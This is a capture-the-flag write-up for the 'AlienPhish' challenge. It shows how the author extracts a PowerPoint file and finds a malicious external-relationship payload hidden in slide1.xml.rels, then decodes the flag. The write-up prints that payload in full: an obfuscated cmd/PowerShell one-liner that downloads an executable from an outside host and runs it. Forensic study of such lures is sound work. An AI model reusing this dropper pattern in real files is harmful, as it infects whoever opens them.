
HTB Cyber Apocalypse CTF - AlienPhish

AlienPhish - PowerPoint File Forensics

  • I came up with this cool little trick on the spot and decided to use VS Code to just search through all the files at once.
  • Extract the PowerPoint file with unzip file.pptx and then open the entire directory in VS Code (code . if you have it set up that way in terminal/env) for searching through all the files quickly and easily. I use VS Code. You can use any other code editor you use/like that can search through all the files at once (or you could use grep but I’d rather go through everything with a code editor when doing any kind of file forensics).
  • Search for keywords like vba, cmd, exe, etc.
  • Found what I wanted immediately in slide1.xml.rels file with cmd and exe keyword search.
  • That file had a malicious cmd payload in Target attribute:
<Relationship Id="rId2" Type="" Target="cmd.exe%20/V:ON/C%22set%20yM=%22o$%20eliftuo-%20exe.x/neila.htraeyortsed/:ptth%20rwi%20;'exe.99zP_MHMyNGNt9FM391ZOlGSzFDSwtnQUh0Q'%20+%20pmet:vne$%20=%20o$%22%20c-%20llehsrewop&amp;&amp;for%20/L%20%25X%20in%20(122;-1;0)do%20set%20kCX=!kCX!!yM:~%25X,1!&amp;&amp;if%20%25X%20leq%200%20call%20%25kCX:*kCX!=%25%22" TargetMode="External"/>
  • We can tell from the URL exe.x/neila.htraeyortsed/:ptth that some part of the payload is reversed.
  • But the file name that this powershell command is downloading looks like an encoded string.
  • 99zP_MHMyNGNt9FM391ZOlGSzFDSwtnQUh0Q looked like an encoded value so went to CyberChef, reversed and decoded to Base64 and got the flag.
  • Encoded Value => Reverse => Q0hUQntwSDFzSGlOZ193MF9tNGNyMHM_Pz99 => Base64 Decode => Flag => CHTB{pH1sHiNg_w0_m4cr0s>??}
  • But that flag was not accepted and showed incorrect. Probably some decoding error so I went back to CyberChef and in Base64 Decoding, there was an option for URL Safe decoding which gave => CHTB{pH1sHiNg_w0_m4cr0s???}. This was one accepted.
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